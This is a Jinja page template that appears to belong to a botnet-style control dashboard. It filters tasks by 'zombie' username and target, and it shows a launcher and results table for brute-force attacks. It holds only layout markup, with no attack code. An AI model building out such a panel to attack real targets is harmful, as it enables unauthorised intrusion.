

{% extends "pages/dashboard/base_dashboard.html" %}

{% block lateral_panel %}

{% with data_type = 'tasks', window_type = 'filter', filters=('zombie_username', 'created_at', 'target') %}
    {% include 'objects/windows/filter.html' %}
{% endwith %}

{% if data_filter.data %}

  {% with data_type='brt', window_type = 'launcher', task_type=task_type, img_class = 'launcher-img-l', banner = 'img/wolfenstein.png', icon = '🎰', panel_title = 'bruteforce attacK' %}
    <div id="{{ data_type + '-launcher' }}" class="launcher-m">
      {% include 'objects/windows/attacks-launcher.html' %}
    </div>
  {% endwith %}

{% endif %}

{% endblock %}



{% block central_panel %}

{% if attacks_deleted %}
  {% with window_type = 'popup', data_type='tasks', operation='deleted', data=attacks_deleted, close_button_action = 'link', close_link = url_for('attacks_bp.attacks', task_type=task_type), img='img/gta2busted.jpg' %}
    {% include 'objects/windows/popups/updated-data.html' %}
  {% endwith %}
{% endif %}


{% if data_filter.data %}

  {% with data=data_filter.data, window_type = 'table-results', data_type = 'tasks', task_type = 'brt', data_buttons=True, scrollable_table=True, table_class='table-xl' %}
    {% include 'objects/windows/data-results.html' %}
  {% endwith %}


{% else %}

{% with data_type = 'tasks', task_type=task_type, banner = 'img/wolfenstein.png', icon = '🎰', panel_title = 'bruteforce attacK' %}
  {% include 'pages/dashboard/tools/base_attack.html' %}
{% endwith %}

{% endif %}

{% endblock %}